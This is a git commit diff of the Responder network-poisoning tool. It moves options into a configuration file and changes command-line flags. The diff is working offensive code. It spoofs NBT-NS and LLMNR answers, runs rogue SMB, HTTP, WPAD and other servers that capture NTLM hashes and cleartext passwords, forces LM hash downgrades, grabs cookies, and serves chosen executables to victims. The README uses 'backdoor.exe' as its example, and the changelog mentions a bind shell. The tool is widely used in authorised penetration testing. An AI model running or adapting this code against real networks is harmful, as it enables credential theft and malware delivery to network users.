Added: Configuration file, removed several cli options and several fixes.

2025-07-30 11:38:55 -07:00 · 2013-11-08 21:23:09 -05:00 · 2013-11-08 21:23:09 -05:00 · 95eed09942
commit 95eed09942
parent d57310273d
4 changed files with 138 additions and 153 deletions
--- a/CHANGELOG.txt
+++ b/CHANGELOG.txt
@ -1,4 +1,8 @@
-ChangeLog from 0.6 to 1.9:
+ChangeLog Responder 1.9:
 - Added: Ability to change the HTML payload returned after authentication. See Responder.conf
 - Added: Ability to change the pac script in Responder.conf
 - Added: Configuration file for Responder. See Responder.conf
 - Removed: Several options removed.
 - Added: Bind shell which when executed on a victim workstation, will bind cmd.exe to port 140.
 - Added: -e, --exe, --file option for serving specific files via the HTTP and WPAD server.
 - Added: Ability to bind Responder to a specific interface
--- a/HTTPProxy.py
+++ b/HTTPProxy.py
@ -92,6 +92,26 @@ class ServeAlwaysExeFile(Packet):
    def calculate(self):
        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 class ServeAlwaysNormalFile(Packet):
    fields = OrderedDict([
        ("Code",          "HTTP/1.1 200 OK\r\n"),
        ("ContentType",   "Content-Type: text/html\r\n"),
        ("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
        ("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
        ("Server",        "Server: Microsoft-IIS/7.5\r\n"),
        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
        ("ContentLen",    "Content-Length: "),
        ("ActualLen",     "76"), 
        ("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
        ("Connection",    "Connection: keep-alive\r\n"),
        ("X-CCC",         "US\r\n"),
        ("X-CID",         "2\r\n"),
        ("CRLF",          "\r\n"),
        ("Payload",       "jj"),
    ])
    def calculate(self):
        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
 #HTTP Packet used for further NTLM auth.
 class IIS_Auth_407_Ans(Packet):
    fields = OrderedDict([
--- a/README.txt
+++ b/README.txt
@ -11,7 +11,7 @@ suffix (see: http://support.microsoft.com/kb/163409). By default, the
 tool will only answers to File Server Service request, which is for SMB.
 The concept behind this, is to target our answers, and be stealthier on
 the network. This also helps to ensure that we don't break legitimate
-NBT-NS behavior. You can set the -r option to 1 via command line if 
+NBT-NS behavior. You can set the -r option to "On" via command line if 
 you want this tool to answer to the Workstation Service request name
 suffix.
@ -22,12 +22,12 @@ FEATURES
  Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP by default.
  Successfully tested from Windows 95 to Server 2012 RC, Samba and Mac OSX Lion.
  Clear text password is supported for NT4, and LM hashing downgrade when the 
-  --lm option is set to 1. This functionality is enabled by default when the
+  --lm option is set to On. This functionality is enabled by default when the
  tool is launched.
 - Built-in MSSQL Auth server.
  In order to redirect SQL Authentication to this tool, you will need to
-  set the option -r to 1(NBT-NS queries for SQL Server lookup are using
+  set the option -r to On(NBT-NS queries for SQL Server lookup are using
  the Workstation Service name suffix) for systems older than windows 
  Vista (LLMNR will be used for Vista and higher). This server supports
  NTLMv1, LMv2 hashes. This functionality was successfully tested on 
@ -35,7 +35,7 @@ FEATURES
 - Built-in HTTP Auth server.
  In order to redirect HTTP Authentication to this tool, you will need
-  to set the option -r to 1 for Windows version older than Vista (NBT-NS
+  to set the option -r to On for Windows version older than Vista (NBT-NS
  queries for HTTP server lookup are sent using the Workstation Service
  name suffix). For Vista and higher, LLMNR will be used. This server 
  supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server
@ -45,7 +45,7 @@ FEATURES
 - Built-in HTTPS Auth server.
  In order to redirect HTTPS Authentication to this tool, you will need
-  to set the -r option to 1 for Windows versions older than Vista (NBT-NS
+  to set the -r option to On for Windows versions older than Vista (NBT-NS
  queries for HTTP server lookups are sent using the Workstation Service
  name suffix). For Vista and higher, LLMNR will be used. This server 
  supports NTLMv1, NTLMv2, *and* Basic Authentication. This server
@ -57,7 +57,7 @@ FEATURES
 - Built-in LDAP Auth server.
  In order to redirect LDAP Authentication to this tool, you will need
-  to set the option -r to 1 for Windows version older than Vista (NBT-NS
+  to set the option -r to On for Windows version older than Vista (NBT-NS
  queries for HTTP server lookup are sent using the Workstation Service
  name suffix). For Vista and higher, LLMNR will be used. This server 
  supports NTLMSSP hashes and Simple Authentication (clear text authentication).
@ -86,7 +86,9 @@ FEATURES
 - WPAD rogue transparent proxy server. This module will *silently* grab the encrypted
  credentials of anyone launching Internet Explorer on the network. It will also grab
-  the cookie of the requested page. This module is higly effective. You can now send your custom files to a victim.
+  the cookie of the requested page. This module is higly effective. You can now send your custom Pac script to a victim. See Responder.conf.
 - Responder is now using a configuration file. See Responder.conf.
 CONSIDERATIONS
 ==============
@ -107,13 +109,14 @@ CONSIDERATIONS
 USAGE
 =====
 First of all, please take a look at Responder.conf and set it for your needs.
 Running this tool:
 - python Responder.py [options]
 Usage Example:
-python Responder.py -i 10.20.30.40 -b 1 -r 0 -f On
+python Responder.py -i 10.20.30.40 -b On -r On
 Options List:
@ -122,62 +125,24 @@ Options List:
 -i 10.20.30.40, --ip=10.20.30.40     The ip address to redirect the traffic to.
                                     (usually yours)
-b 0, --basic=0                      Set this to 1 if you want to return a 
+-b Off, --basic=Off                  Set this to On if you want to return a 
-                                     Basic HTTP authentication. 0 will return 
+                                     Basic HTTP authentication. Off will return 
                                     an NTLM authentication.
-s Off, --http=Off                   Set this to On or Off to start/stop the
+-r Off, --wredir=Off                 Set this to On to enable answers for netbios 
                                     HTTP server. Default value is On.
 -S Off, --smb=Off                    Set this to On or Off to start/stop the
                                     SMB server. Default value is On.
 -q Off, --sql=Off                    Set this to On or Off to start/stop the
                                     SQL server. Default value is On.
 -r 0, --wredir=0                     Set this to enable answers for netbios 
                                     wredir suffix queries. Answering to wredir
                                     will likely break stuff on the network 
                                     (like classics 'nbns spoofer' will).
-                                     Default value is therefore set to Off (0).
+                                     Default value is therefore set to Off.
 -c 1122334455667788, --challenge=    The server challenge to set for NTLM
                                     authentication. If not set, then defaults
                                     to 1122334455667788, the most common
                                     challenge for existing Rainbow Tables.
 -l file.log, --logfile=filename.log  Log file to use for Responder session.
 -f Off, --fingerprint=Off            This option allows you to fingerprint a 
                                     host that issued an NBT-NS or LLMNR query.
 -F On, --ftp=On                      Set this to On or Off to start/stop the FTP server.
                                     Default value is On
 -L On, --ldap=On                     Set this to On or Off to start/stop the LDAP server.
                                     Default value is On
 -D On, --dns=On                      Set this to On or Off to start/stop the DNS server.
                                     Default value is On
 -w On, --wpad=On                     Set this to On or Off to start/stop the WPAD rogue
                                     proxy server. Default value is On
--lm=0                               Set this to 1 if you want to force LM hashing
+--lm=Off                             Set this to On if you want to force LM hashing
-                                     downgrade for Windows XP/2003 and earlier. Default value is False (0)
+                                     downgrade for Windows XP/2003 and earlier. Default value is Off
 -e 0                                 Set this option to 1 if you'd like to serve a specific
                                     file via http & WPAD proxy server when  one of these
                                     extensions are present in the url. Default value is
                                     False (0)
 --exe=0                              Set this option to 1 if you'd like to always serve a
                                     specific file via http & WPAD proxy server. It's best
                                     to use this option with the --file option. Default
                                     value is False (0)
 --file=backdoor.exe                  Serve a specific file when using -e option. Default is
                                     FixInternet.exe (provided with Responder)
 For more information read these posts: 
--- a/Responder.py
+++ b/Responder.py
@ -16,7 +16,7 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os
+import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os,ConfigParser
 from Fingerprint import RunSmbFinger,OsNameClientVersion
 from odict import OrderedDict
 from socket import inet_aton
@ -27,41 +27,15 @@ parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b 1 -s On -r
                               )
 parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
-parser.add_option('-I','--interfaceIP', action="store", help="The IP you want Responder to listen on, default is 0.0.0.0 (all interfaces)", metavar="10.20.30.40",dest="BOUND_TO_IP")
+parser.add_option('-b', '--basic',action="store", help="Set this to On if you want to return a Basic HTTP authentication. Off will return an NTLM authentication.This option is mandatory.", metavar="Off",dest="Basic", choices=['On','ON','Off','OFF'], default="Off")
-parser.add_option('-b', '--basic',action="store", help="Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication.This option is mandatory.", metavar="0",dest="Basic", choices=['0','1'], default="0")
+parser.add_option('-r', '--wredir',action="store", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' will). Default value is therefore set to Off", metavar="Off",dest="Wredirect", choices=['On','ON','Off','OFF'], default="Off")
-parser.add_option('-s', '--http',action="store", help="Set this to On or Off to start/stop the HTTP server. Default value is On", metavar="Off",dest="on_off", choices=['On','Off'], default="On")
+parser.add_option('-f','--fingerprint', action="store", dest="Finger", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", metavar="Off", choices=['On','ON','Off','OFF'], default="Off")
-parser.add_option('--ssl',action="store", help="Set this to On or Off to start/stop the HTTPS server. Default value is On", metavar="Off",dest="SSL_On_Off", choices=['On','Off'], default="On")
+parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is Off", metavar="Off", choices=['On','ON','Off','OFF'], default="Off")
-parser.add_option('-S', '--smb',action="store", help="Set this to On or Off to start/stop the SMB server. Default value is On", metavar="Off",dest="SMB_on_off", choices=['On','Off'], default="On")
+parser.add_option('--lm',action="store", help="Set this to Off if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is Off", metavar="Off",dest="LM_On_Off", choices=['On','ON','Off','OFF'], default="Off")
 parser.add_option('-q', '--sql',action="store", help="Set this to On or Off to start/stop the SQL server. Default value is On", metavar="Off",dest="SQL_on_off", choices=['On','Off'], default="On")
 parser.add_option('-r', '--wredir',action="store", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' will). Default value is therefore set to Off (0)", metavar="0",dest="Wredirect", choices=['1','0'], default="0")
 parser.add_option('-c','--challenge', action="store", dest="optChal", help = "The server challenge to set for NTLM authentication.  If not set, then defaults to 1122334455667788, the most common challenge for existing Rainbow Tables", metavar="1122334455667788", default="1122334455667788")
 parser.add_option('-l','--logfile', action="store", dest="sessionLog", help = "Log file to use for Responder session. ", metavar="Responder-Session.log", default="Responder-Session.log")
 parser.add_option('-f','--fingerprint', action="store", dest="Finger", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", metavar="Off", choices=['On','Off'], default="Off")
 parser.add_option('-F','--ftp', action="store", dest="FTP_On_Off", help = "Set this to On or Off to start/stop the FTP server. Default value is On", metavar="On", choices=['On','Off'], default="On")
 parser.add_option('-L','--ldap', action="store", dest="LDAP_On_Off", help = "Set this to On or Off to start/stop the LDAP server. Default value is On", metavar="On", choices=['On','Off'], default="On")
 parser.add_option('-D','--dns', action="store", dest="DNS_On_Off", help = "Set this to On or Off to start/stop the DNS server. Default value is On", metavar="On", choices=['On','Off'], default="On")
 parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set this to On or Off to start/stop the WPAD rogue proxy server. Default value is Off", metavar="Off", choices=['On','Off'], default="Off")
 parser.add_option('--lm',action="store", help="Set this to 1 if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False (0)", metavar="0",dest="LM_On_Off", choices=['0','1'], default="0")
 parser.add_option('-e',action="store", help="Set this option to 1 if you'd like to serve a specific file via http & WPAD proxy server when  one of these extensions are present in the url. Default value is False (0)", metavar="0",dest="Exe_On_Off", choices=['0','1'], default="0")
 parser.add_option('--exe',action="store", help="Set this option to 1 if you'd like to always serve a specific file via http & WPAD proxy server. It's best to use this option with the --file option. Default value is False (0)", metavar="0",dest="Exec_Mode_On_Off", choices=['0','1'], default="0")
 parser.add_option('--file',action="store", help="Serve a specific file when using -e option. Default is FixInternet.exe (provided with Responder)", metavar="backdoor.exe",dest="FILENAME", default="FixInternet.exe")
 options, args = parser.parse_args()
@ -70,39 +44,46 @@ if options.OURIP is None:
   parser.print_help()
   exit(-1)
-if len(options.optChal) is not 16:
+#Config parsing
 config = ConfigParser.ConfigParser()
 config.read('Responder.conf')
 # Set some vars.
 BIND_TO_IP = config.get('Responder Core', 'Bind_to')
 On_Off = config.get('Responder Core', 'HTTP').upper()
 SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
 SMB_On_Off = config.get('Responder Core', 'SMB').upper()
 SQL_On_Off = config.get('Responder Core', 'SQL').upper()
 FTP_On_Off = config.get('Responder Core', 'FTP').upper()
 LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
 DNS_On_Off = config.get('Responder Core', 'DNS').upper()
 NumChal = config.get('Responder Core', 'Challenge')
 SessionLog = config.get('Responder Core', 'SessionLog')
 Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
 Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
 FILENAME = config.get('HTTP Server', 'Filename')
 WPAD_Script = config.get('HTTP Server', 'WPADScript')
 #Cli options.
 OURIP = options.OURIP
 LM_On_Off = options.LM_On_Off.upper()
 WPAD_On_Off = options.WPAD_On_Off.upper()
 Wredirect = options.Wredirect.upper()
 Basic = options.Basic.upper()
 Finger_On_Off = options.Finger.upper()
 if BIND_TO_IP == None:
   BIND_TO_IP = ''
 if len(NumChal) is not 16:
   print "The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n"
   parser.print_help()
   exit(-1)
 #Logger
 import logging
-logging.basicConfig(filename=str(options.sessionLog),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
+logging.basicConfig(filename=str(SessionLog),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
 logging.warning('Responder Started')
 # Set some vars.
 OURIP = options.OURIP
 BOUND_TO_IP = options.BOUND_TO_IP
 Basic = options.Basic
 On_Off = options.on_off.upper()
 Exe_On_Off = options.Exe_On_Off
 Exec_Mode_On_Off =options.Exec_Mode_On_Off
 FILENAME = options.FILENAME
 SSL_On_Off = options.SSL_On_Off.upper()
 SMB_On_Off = options.SMB_on_off.upper()
 SQL_On_Off = options.SQL_on_off.upper()
 FTP_On_Off = options.FTP_On_Off.upper()
 LDAP_On_Off = options.LDAP_On_Off.upper()
 Finger_On_Off = options.Finger.upper()
 DNS_On_Off = options.DNS_On_Off.upper()
 WPAD_On_Off = options.WPAD_On_Off.upper()
 LM_On_Off = options.LM_On_Off.upper()
 Wredirect = options.Wredirect
 NumChal = options.optChal
 if BOUND_TO_IP == None:
   BOUND_TO_IP = ''
 def Show_Help(ExtraHelpData):
   help = "NBT Name Service/LLMNR Answerer 1.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n"
   help+= ExtraHelpData
@ -131,7 +112,7 @@ Challenge = ""
 for i in range(0,len(NumChal),2):
    Challenge += NumChal[i:i+2].decode("hex")
-Show_Help("[+]NBT-NS & LLMNR responder started\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways serving executable via HTTP&WPAD is:%s\n\n"%(NumChal,WPAD_On_Off,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
+Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
 #Simple NBNS Services.
 W_REDIRECT   = "\x41\x41\x00"
@ -191,7 +172,7 @@ class NBT_Ans(Packet):
 def Validate_NBT_NS(data,Wredirect):
    if FILE_SERVER == data[43:46]:
       return True
-    if Wredirect == "1":
+    if Wredirect == "ON":
       if W_REDIRECT == data[43:46]:
          return True
    else:
@ -909,7 +890,7 @@ def WpadCustom(data,client):
          Message = "[+]WPAD file sent to: %s"%(client)
          print Message
          logging.warning(Message)
-          buffer1 = WPADScript()
+          buffer1 = WPADScript(Payload=WPAD_Script)
          buffer1.calculate()
          return str(buffer1)
       else:
@ -917,13 +898,13 @@ def WpadCustom(data,client):
 # Function used to check if we answer with a Basic or NTLM auth. 
 def Basic_Ntlm(Basic):
-    if Basic == "1":
+    if Basic == "ON":
       return IIS_Basic_401_Ans()
-    if Basic == "0":
+    if Basic == "OFF":
       return IIS_Auth_401_Ans()
 def ServeEXE(data,client, Filename):
-    Message = "[+]Exe file sent to: %s . Try telnet %s on port 140"%(client,client)
+    Message = "[+]Sent %s file sent to: %s."%(Filename,client)
    print Message
    logging.warning(Message)
    with open (Filename, "rb") as bk:
@ -932,33 +913,42 @@ def ServeEXE(data,client, Filename):
       return data
 def ServeEXEOrNot(on_off):
-    if Exe_On_Off == "1":
+    if Exe_On_Off == "ON":
       return True
-    if Exe_On_Off == "0":
+    if Exe_On_Off == "OFF":
       return False
 def ServeEXECAlwaysOrNot(on_off):
-    if Exec_Mode_On_Off == "1":
+    if Exec_Mode_On_Off == "ON":
       return True
-    if Exec_Mode_On_Off == "0":
+    if Exec_Mode_On_Off == "OFF":
       return False
-Exec_Mode_On_Off
+def IsExecutable(Filename):
    exe = re.findall('.exe',Filename)
    if exe:
       return True
    else:
       return False
 #Handle HTTP packet sequence.
 def PacketSequence(data,client):
    a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
    b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
    if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
-       payload = ServeEXE(data,client,FILENAME)
+       File = config.get('HTTP Server', 'ExecFilename')
-       buffer1 = ServerExeFile(Payload = payload,filename=FILENAME)
+       buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
       buffer1.calculate()
       return str(buffer1)
    if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
-       payload = ServeEXE(data,client,FILENAME)
+       if IsExecutable(FILENAME):
-       buffer1 = ServeAlwaysExeFile(Payload = payload,ContentDiFile=FILENAME)
+          buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
-       buffer1.calculate()
+          buffer1.calculate()
-       return str(buffer1)
+          return str(buffer1)
       else:
          buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
          buffer1.calculate()
          return str(buffer1)
    if a:
       packetNtlm = b64decode(''.join(a))[8:9]
       if packetNtlm == "\x01":
@ -972,7 +962,7 @@ def PacketSequence(data,client):
       if packetNtlm == "\x03":
          NTLM_Auth= b64decode(''.join(a))
          ParseHTTPHash(NTLM_Auth,client)
-          buffer1 = IIS_Auth_Granted()
+          buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
          buffer1.calculate()
          return str(buffer1)
    if b:
@ -981,7 +971,7 @@ def PacketSequence(data,client):
       WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
       print "[+]HTTP-User & Password:", b64decode(''.join(b))
       logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(b))))
-       buffer1 = IIS_Auth_Granted()
+       buffer1 = IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe'))
       buffer1.calculate()
       return str(buffer1)
@ -1049,9 +1039,9 @@ def HostDidntAuthBefore(client):
       return True
 def ProxyBasic_Ntlm(Basic):
-    if Basic == "1":
+    if Basic == "ON":
       return IIS_Basic_407_Ans()
-    if Basic == "0":
+    if Basic == "OFF":
       return IIS_Auth_407_Ans()
 def ParseDomain(data,client):
@ -1071,15 +1061,19 @@ def ProxyPacketSequence(data,client):
    a = re.findall('(?<=Proxy-Authorization: NTLM )[^\\r]*', data)
    b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
    if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
-       payload = ServeEXE(data,client,FILENAME)
+       File = config.get('HTTP Server', 'ExecFilename')
-       buffer1 = ServerExeFile(Payload = payload, filename=FILENAME)
+       buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File)
       buffer1.calculate()
       return str(buffer1)
    if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
-       payload = ServeEXE(data,client,FILENAME)
+       if IsExecutable(FILENAME):
-       buffer1 = ServeAlwaysExeFile(Payload = payload,ContentDiFile=FILENAME)
+          buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME)
-       buffer1.calculate()
+          buffer1.calculate()
-       return str(buffer1)
+          return str(buffer1)
       else:
          buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME))
          buffer1.calculate()
          return str(buffer1)
    if a:
       packetNtlm = b64decode(''.join(a))[8:9]
       if packetNtlm == "\x01":
@ -1199,7 +1193,7 @@ def HTTPSPacketSequence(data,client):
       if packetNtlm == "\x03":
          NTLM_Auth= b64decode(''.join(a))
          ParseHTTPSHash(NTLM_Auth,client)
-          buffer1 = str(IIS_Auth_Granted())
+          buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
          return buffer1
    if b:
       GrabCookie(data,client)
@ -1207,7 +1201,7 @@ def HTTPSPacketSequence(data,client):
       WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
       print "[+]HTTPS-User & Password:", b64decode(''.join(b))
       logging.warning('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
-       buffer1 = str(IIS_Auth_Granted())
+       buffer1 = str(IIS_Auth_Granted(Payload=config.get('HTTP Server','HTMLToServe')))
       return buffer1
    else:
@ -1217,8 +1211,8 @@ class SSlSock(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    def __init__(self, server_address, RequestHandlerClass):
        SocketServer.BaseServer.__init__(self, server_address, RequestHandlerClass)
        ctx = SSL.Context(SSL.SSLv3_METHOD)
-        cert = 'Certs/responder.crt'
+        cert = config.get('HTTPS Server', 'cert')
-        key =  'Certs/responder.key'
+        key =  config.get('HTTPS Server', 'key')
        ctx.use_privatekey_file(key)
        ctx.use_certificate_file(cert)
        self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
@ -1402,59 +1396,59 @@ class LDAP(SocketServer.BaseRequestHandler):
 #Function name self-explanatory
 def Is_HTTP_On(on_off):
    if on_off == "ON":
-       return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 80,HTTP))
+       return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 80,HTTP))
    if on_off == "OFF":
       return False
 #Function name self-explanatory
 def Is_HTTPS_On(SSL_On_Off):
    if SSL_On_Off == "ON":
-       return thread.start_new(serve_thread_SSL,(BOUND_TO_IP, 443,DoSSL))
+       return thread.start_new(serve_thread_SSL,(BIND_TO_IP, 443,DoSSL))
    if SSL_On_Off == "OFF":
       return False
 #Function name self-explanatory
 def Is_WPAD_On(on_off):
    if on_off == "ON":
-       return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 3141,HTTPProxy))
+       return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 3141,HTTPProxy))
    if on_off == "OFF":
       return False
 #Function name self-explanatory
 def Is_SMB_On(SMB_On_Off):
    if SMB_On_Off == "ON":
-       if LM_On_Off == "1":
+       if LM_On_Off == "ON":
-          return thread.start_new(serve_thread_tcp, (BOUND_TO_IP, 445,SMB1LM)),thread.start_new(serve_thread_tcp,('', 139,SMB1LM))
+          return thread.start_new(serve_thread_tcp, (BIND_TO_IP, 445,SMB1LM)),thread.start_new(serve_thread_tcp,(BIND_TO_IP, 139,SMB1LM))
       else:
-          return thread.start_new(serve_thread_tcp, (BOUND_TO_IP, 445,SMB1)),thread.start_new(serve_thread_tcp,('', 139,SMB1))
+          return thread.start_new(serve_thread_tcp, (BIND_TO_IP, 445,SMB1)),thread.start_new(serve_thread_tcp,(BIND_TO_IP, 139,SMB1))
    if SMB_On_Off == "OFF":
       return False
 #Function name self-explanatory
 def Is_SQL_On(SQL_On_Off):
    if SQL_On_Off == "ON":
-       return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 1433,MSSQL))
+       return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 1433,MSSQL))
    if SQL_On_Off == "OFF":
       return False
 #Function name self-explanatory
 def Is_FTP_On(FTP_On_Off):
    if FTP_On_Off == "ON":
-       return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 21,FTP))
+       return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 21,FTP))
    if FTP_On_Off == "OFF":
       return False
 #Function name self-explanatory
 def Is_LDAP_On(LDAP_On_Off):
    if LDAP_On_Off == "ON":
-       return thread.start_new(serve_thread_tcp,(BOUND_TO_IP, 389,LDAP))
+       return thread.start_new(serve_thread_tcp,(BIND_TO_IP, 389,LDAP))
    if LDAP_On_Off == "OFF":
       return False
 #Function name self-explanatory
 def Is_DNS_On(DNS_On_Off):
    if DNS_On_Off == "ON":
-       return thread.start_new(serve_thread_udp,(BOUND_TO_IP, 53,DNS)),thread.start_new(serve_thread_tcp,('', 53,DNSTCP))
+       return thread.start_new(serve_thread_udp,(BIND_TO_IP, 53,DNS)),thread.start_new(serve_thread_tcp,(BIND_TO_IP, 53,DNSTCP))
    if DNS_On_Off == "OFF":
       return False
@ -1475,6 +1469,7 @@ def serve_thread_tcp(host, port, handler):
 		server.serve_forever()
 	except:
 		print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root) and no other servers are running."
                raise
 def serve_thread_SSL(host, port, handler):
 	try:
@ -1494,9 +1489,9 @@ def main():
      Is_LDAP_On(LDAP_On_Off)
      Is_DNS_On(DNS_On_Off)
      #Browser listener loaded by default
-      thread.start_new(serve_thread_udp,(BOUND_TO_IP, 138,Browser))
+      thread.start_new(serve_thread_udp,(BIND_TO_IP, 138,Browser))
      ## Poisoner loaded by default, it's the purpose of this tool...
-      thread.start_new(serve_thread_udp,(BOUND_TO_IP, 137,NB))
+      thread.start_new(serve_thread_udp,(BIND_TO_IP, 137,NB))
      thread.start_new(RunLLMNR())
    except KeyboardInterrupt:
        exit()
@ -1508,3 +1503,4 @@ if __name__ == '__main__':
        raise
    raw_input()